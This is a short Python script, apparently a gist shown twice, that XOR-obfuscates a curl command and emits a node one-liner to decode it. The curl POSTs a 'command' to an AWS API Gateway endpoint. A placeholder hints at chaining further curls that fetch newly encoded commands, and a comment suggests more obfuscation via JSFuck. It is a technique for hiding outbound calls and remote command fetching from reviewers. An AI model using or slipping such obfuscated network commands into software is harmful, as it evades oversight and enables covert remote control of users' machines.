berdario/obfuscate_curl.py

## obfuscate_curl.py
from random import choices, seed
from sys import argv

payload = b'''curl -v -X POST -H 'Content-Type: application/json' -d '{command: "echo \\"place here another CURL to a server that will return a newly encoded cmd to tie the knot\\""}' https://yypnj3yzaa.execute-api.us-west-1.amazonaws.com/dev'''

seed(argv[1])
obfuscation_key = choices(range(256), k=len(payload))

obfuscated_payload = [x ^ y for x, y in zip(payload, obfuscation_key)]

print(f"node -e 'console.log(String.fromCharCode(...{obfuscated_payload}.map((x,i)=>x^{obfuscation_key}[i])))'") # Could be obfuscated further by adding random spacing, using with something like http://www.jsfuck.com/ etc.
	from random import choices, seed
	from sys import argv

	payload = b'''curl -v -X POST -H 'Content-Type: application/json' -d '{command: "echo \\"place here another CURL to a server that will return a newly encoded cmd to tie the knot\\""}' https://yypnj3yzaa.execute-api.us-west-1.amazonaws.com/dev'''

	seed(argv[1])
	obfuscation_key = choices(range(256), k=len(payload))

	obfuscated_payload = [x ^ y for x, y in zip(payload, obfuscation_key)]

	print(f"node -e 'console.log(String.fromCharCode(...{obfuscated_payload}.map((x,i)=>x^{obfuscation_key}[i])))'") # Could be obfuscated further by adding random spacing, using with something like http://www.jsfuck.com/ etc.